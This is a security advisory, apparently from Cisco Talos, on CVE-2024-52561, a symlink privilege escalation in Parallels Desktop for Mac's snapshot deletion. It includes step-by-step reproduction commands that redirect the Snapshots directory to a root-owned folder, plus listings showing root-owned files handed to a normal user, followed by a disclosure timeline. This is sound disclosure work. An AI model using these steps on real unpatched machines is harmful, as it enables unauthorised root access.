CVE-2024-52561
A privilege escalation vulnerability exists in the Snapshot functionality of Parallels Desktop for Mac version 20.1.1 (build 55740). When a snapshot of a virtual machine is deleted, a root service verifies and modifies the ownership of the snapshot files. By using a symlink, an attacker can change the ownership of files owned by root to a lower-privilege user, potentially leading to privilege escalation.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Parallels Desktop for Mac version 20.1.1 (55740)
Parallels Desktop for Mac - https://www.parallels.com/products/desktop/
7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE-708 - Incorrect Ownership Assignment
Parallels Desktop for Mac is an application that provides desktop virtualization, allowing users to run macOS, Windows, or Linux virtual machines on a Mac. It offers tools to create, configure, and manage virtual machines effectively.
prl_disp_service is a Parallels Desktop service that manages all communication between macOS, Parallels Desktop, and virtual machines. This service runs with root privileges.
A privilege escalation vulnerability exists when a snapshot of a virtual machine is deleted. During this process, the prl_disp_service deletes all files related to the snapshot located in the Snapshots directory. The Snapshots directory is owned by a normal user, making it possible to replace the Snapshots directory with a symlink to a directory owned by root. If the files in the Snapshots directory are not owned by the current user, the prl_disp_service changes the ownership of all files and directories under Snapshots to the current user.
By replacing the Snapshots directory with a symlink, the prl_disp_service can be exploited to change the ownership of root-owned files to a lower-privilege user. This allows the lower-privilege user to modify or delete files, which can potentially be used to achieve privilege escalation.
Steps to reproduce:
Take a snapshot of a virtual machine (VM). Let say the name of the VM in this case is Debian_12. This will create the Snapshots directory with following files:
ls Snapshots
{2756e7a6-cb51-4dfb-b329-99750e41a58b}.dat
{2756e7a6-cb51-4dfb-b329-99750e41a58b}.mem
{2756e7a6-cb51-4dfb-b329-99750e41a58b}.png
{2756e7a6-cb51-4dfb-b329-99750e41a58b}.pvc
{2756e7a6-cb51-4dfb-b329-99750e41a58b}.pvi
{2756e7a6-cb51-4dfb-b329-99750e41a58b}.sav
Navigate to the directory of the selected VM ( Debian_12.pvm) and delete or move the Snapshots directory.
mv Snapshots Snapshots.backup
Create a symlink to a directory owned by root. In this case, create a symlink to the MacOS directory within Parallels VM.app.
% ln -s "/Applications/Parallels Desktop.app/Contents/MacOS/Parallels VM.app/Contents/MacOS" Snapshots
% ls -la Snapshots
lrwxr-xr-x 1 main staff 82 2 Dec 12:25 Snapshots -> /Applications/Parallels Desktop.app/Contents/MacOS/Parallels VM.app/Contents/MacOS
% cd Snapshots
% ls -la
total 63288
drwxr-xr-x 3 root wheel 96 26 Nov 14:31 .
drwxr-xr-x 7 root wheel 224 26 Nov 14:31 ..
-rwxr-xr-x 1 root wheel 32401024 26 Nov 14:31 prl_vm_app
% ls -la "/Applications/Parallels Desktop.app/Contents/MacOS/Parallels VM.app/Contents/MacOS"
total 63288
drwxr-xr-x 3 root wheel 96 26 Nov 14:31 .
drwxr-xr-x 7 root wheel 224 26 Nov 14:31 ..
-rwxr-xr-x 1 root wheel 32401024 26 Nov 14:31 prl_vm_app
Note that prl_vm_app is owned by root
Next, open the Control Center in the Parallels Desktop application. Right-click on the selected VM and choose Manage Snapshots. Then, select the existing snapshot and click the Delete button to remove it.
Note that the delete action will fail, but internally, the prl_disp_service will follow the symlink and change the ownership of the files within it. As a result, it can be observed that the prl_vm_app file is now owned by a lower-privilege user.
% ls -la Snapshots
lrwxr-xr-x 1 main staff 82 2 Dec 12:25 Snapshots -> /Applications/Parallels Desktop.app/Contents/MacOS/Parallels VM.app/Contents/MacOS
ls -la "/Applications/Parallels Desktop.app/Contents/MacOS/Parallels VM.app/Contents/MacOS"
total 63288
drwxr-xr-x 3 root wheel 96 26 Nov 14:31 .
drwxr-xr-x 7 root wheel 224 26 Nov 14:31 ..
-rwxr-xr-x 1 main staff 32401024 26 Nov 14:31 prl_vm_app
By exploiting this vulnerability, it is possible to assign ownership of files or directories owned by root to a low-privilege user. In certain scenarios, this can lead to privilege escalation if the modified files are used to influence root services.
2024-12-18 - Vendor Disclosure
2025-04-17 - Vendor Patch Release
2025-06-03 - Public Release
Discovered by KPC of Cisco Talos.